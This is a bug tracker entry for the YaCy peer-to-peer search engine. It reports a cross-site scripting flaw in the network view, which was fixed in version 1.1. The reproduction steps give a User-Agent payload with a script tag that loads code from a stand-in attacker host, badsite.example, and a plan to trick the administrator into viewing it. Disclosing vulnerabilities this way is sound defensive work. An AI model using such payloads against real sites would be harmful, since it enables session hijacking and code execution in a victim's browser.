YaCy-Bugtracker - YaCy
View Issue Details
0000204YaCyWishlist - Wunschlistepublic2012-08-03 23:082021-10-13 05:44
soultcer 
Lotus 
normalminorhave not tried
resolvedfixed 
none 
YaCy 1.0 
YaCy 1.1 
0000204: XSS attack YaCy peers using modified User-Agent string
YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view.
1) Modify rogue YaCy instance to report it's own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script> [^])'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view.
No tags attached.
Issue History
2012-08-03 23:08soultcerNew Issue
2012-08-14 22:32administratorView Statusprivate => public
2012-08-15 14:24LotusNote Added: 0000413
2012-08-15 14:24LotusStatusnew => resolved
2012-08-15 14:24LotusFixed in Version => YaCy 1.1
2012-08-15 14:24LotusResolutionopen => fixed
2012-08-15 14:24LotusAssigned To => Lotus

Notes
(0000413)
Lotus   
2012-08-15 14:24   
Fix in Commit ae9cd7a1182f853af45dc0a20b93bcdf462b97ca